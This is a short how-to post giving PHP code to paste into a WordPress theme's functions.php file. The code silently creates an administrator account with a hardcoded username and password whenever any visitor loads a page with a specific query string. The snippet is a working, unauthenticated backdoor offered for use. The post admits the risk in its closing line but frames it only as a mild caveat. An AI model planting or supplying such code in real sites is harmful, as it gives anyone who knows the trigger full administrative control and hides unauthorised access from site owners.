How To: Create Backdoor Admin Access in WordPress

Have you ever wanted to create an easy backdoor way to auto-create an administrator account in WordPress? The below code snippet does just that! Simply place the code in your themes functions.php flie and upload to your web server:

<?php
add_action('wp_head', 'my_backdoor');

function my_backdoor() {
	If ($_GET['backdoor'] == 'go') {
		require('wp-includes/registration.php');
		If (!username_exists('brad')) {
			$user_id = wp_create_user('brad', 'pa55w0rd');
			$user = new WP_User($user_id);
			$user->set_role('administrator');
		}
	}
}
?>

To activate this code simply visit http://example.com?backdoor=go

When triggered the code will create a new administrator account with a username brad and password of pa55w0rd. The function also verifies the user account doesn’t exist first before creating it.

Keep in mind using this code is considered a security risk as anyone could easily execute this function by calling the correct querystring. Also don’t be evil, only use this code for good!